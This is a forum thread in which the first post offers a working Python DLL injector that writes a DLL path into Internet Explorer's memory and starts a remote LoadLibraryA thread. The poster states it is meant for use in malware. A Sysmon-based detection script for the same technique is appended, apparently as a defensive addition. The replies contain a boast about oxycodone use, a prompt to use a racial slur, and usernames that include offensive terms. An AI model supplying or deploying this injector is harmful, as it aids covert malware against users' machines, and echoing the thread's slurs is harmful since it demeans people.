Injecting DLL.

  1. #1
    Sophie Pedophile Tech Support
    Avast! I have returned with another Python thread. So I was reading about malware and whatnot and I came upon some articles that had to do with DLL injection. Interested, I set out to create my own DLL injector. After some research this is what I came up with.

    Since this is intended for use in malware we're just going to quietly inject the DLL we have specified into the Internet Explorer process. This script assumes you have your DLL ready to go under the name mydll.dll in the same folder as the script (presumably in a directory where it was downloaded with your malicious executable or something of the sort).

    What's more, the script automatically gets the proper process ID of Internet Explorer and uses it to inject our DLL.


    from win32com.client import GetObject
    from ctypes import *
    import sys, ctypes, os, string, time

    Wmi = GetObject('winmgmts:')
    processes = Wmi.InstancesOf('Win32_Process')
    # Get the internet explorer process
    explorer = Wmi.ExecQuery('select * from Win32_Process where Name="iexplore.exe"')
    # Grab its Pid
    PID = explorer[0].Properties_('ProcessId').Value

    # Get DLL path
    file = 'mydll.dll'

    path = os.path.dirname(__file__)
    DLL_PATH = os.path.join(path, file)


    # Define constants we use
    PAGE_RW_PRIV = 0x04
    PROCESS_ALL_ACCESS = 0x1F0FFF
    VIRTUAL_MEM = 0x3000

    #CTYPES handler
    kernel32 = windll.kernel32

    def dll_inject(PID,DLL_PATH):
        LEN_DLL = len(DLL_PATH)# get the length of the DLL PATH
        hProcess = kernel32.OpenProcess(PROCESS_ALL_ACCESS,False,PID)

        if hProcess == None:

            sys.exit(0)

        DLL_PATH_ADDR = kernel32.VirtualAllocEx(hProcess,
                                                0,
                                                LEN_DLL,
                                                VIRTUAL_MEM,
                                                PAGE_RW_PRIV)
        bool_Written = c_int(0)

        kernel32.WriteProcessMemory(hProcess,
                                    DLL_PATH_ADDR,
                                    DLL_PATH,
                                    LEN_DLL,
                                    byref(bool_Written))

        kernel32DllHandler_addr = kernel32.GetModuleHandleA("kernel32")

        LoadLibraryA_func_addr = kernel32.GetProcAddress(kernel32DllHandler_addr,"LoadLibraryA")


        thread_id = c_ulong(0) # for our thread id

        if not kernel32.CreateRemoteThread(hProcess,
                                           None,
                                           0,
                                           LoadLibraryA_func_addr,
                                           DLL_PATH_ADDR,
                                           0,
                                           byref(thread_id)):

            sys.exit(0)
        else:
            print "Remote Thread 0x%08x created, DLL code injected" % thread_id.value


    Simply comment out the last 'else' and 'print' and it's ready for use. The reason I kept it in is for testing purposes.
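
For defenders, the sequence in post #1 (a full-access handle to iexplore.exe, then a remote thread starting at LoadLibraryA) maps onto Sysmon ProcessAccess (Event ID 10) and CreateRemoteThread (Event ID 8) records. The correlation below is an added example, not part of the original post; it assumes Sysmon logs both event types and delivers them in time order, and every sample event and path is constructed.

```python
# Added example: Sysmon field names are real; every event value below is constructed.
IEXPLORE = r"C:\Program Files\Internet Explorer\iexplore.exe"
SCRIPT_HOST = r"C:\Users\user\Downloads\python.exe"

# Rights a handle needs for VirtualAllocEx + WriteProcessMemory + CreateRemoteThread:
# PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE
INJECT_RIGHTS = 0x0002 | 0x0008 | 0x0020

SAMPLE_EVENTS = [
    # Benign: query-limited handle, cannot write memory or start threads.
    {"EventID": 10, "SourceProcessId": 900,
     "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetProcessId": 2288, "TargetImage": IEXPLORE, "GrantedAccess": "0x1000"},
    # PROCESS_ALL_ACCESS, the mask the script in post #1 requests.
    {"EventID": 10, "SourceProcessId": 4120, "SourceImage": SCRIPT_HOST,
     "TargetProcessId": 2288, "TargetImage": IEXPLORE, "GrantedAccess": "0x1F0FFF"},
    # Remote thread whose start address resolves to LoadLibraryA.
    {"EventID": 8, "SourceProcessId": 4120, "SourceImage": SCRIPT_HOST,
     "TargetProcessId": 2288, "TargetImage": IEXPLORE,
     "StartModule": r"C:\Windows\System32\kernel32.dll",
     "StartFunction": "LoadLibraryA"},
]

def find_loadlibrary_injection(events):
    """Return (source_image, target_image, confidence) per suspicious remote thread."""
    write_capable = set()   # (source pid, target pid) pairs holding inject-capable handles
    findings = []
    for ev in events:
        pair = (ev["SourceProcessId"], ev["TargetProcessId"])
        if pair[0] == pair[1]:
            continue        # a process acting on itself is not cross-process injection
        if ev["EventID"] == 10:
            if int(ev["GrantedAccess"], 16) & INJECT_RIGHTS == INJECT_RIGHTS:
                write_capable.add(pair)
        elif ev["EventID"] == 8:
            # A thread that begins in LoadLibrary* exists only to load a module.
            if ev.get("StartFunction", "").lower().startswith("loadlibrary"):
                confidence = "high" if pair in write_capable else "medium"
                findings.append((ev["SourceImage"], ev["TargetImage"], confidence))
    return findings

if __name__ == "__main__":
    for source, target, confidence in find_loadlibrary_injection(SAMPLE_EVENTS):
        print("%s -> %s (%s confidence)" % (source, target, confidence))
```
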
  2. #2
    Sophie Pedophile Tech Support
    >tfw no replies
  3. #3
    Pauly Roger Yung Blood
    I thought you were going to be injecting some type of new drug or Dilaudid. Do you even do drugs?
  4. #4
    Sophie Pedophile Tech Support
    I thought you were going to be injecting some type of new drug or Dilaudid. Do you even do drugs?

    Of course I do drugs, in fact I'm on 60mg of oxy as I type this, but I inject things in cyberspace as well as in real life breh. Also, if this thread was about injecting drugs it would be in BLTC.
  5. #5
    mashlehash victim of incest [my perspicuously dependant flavourlessness]
    Why don't you call someone a nigger?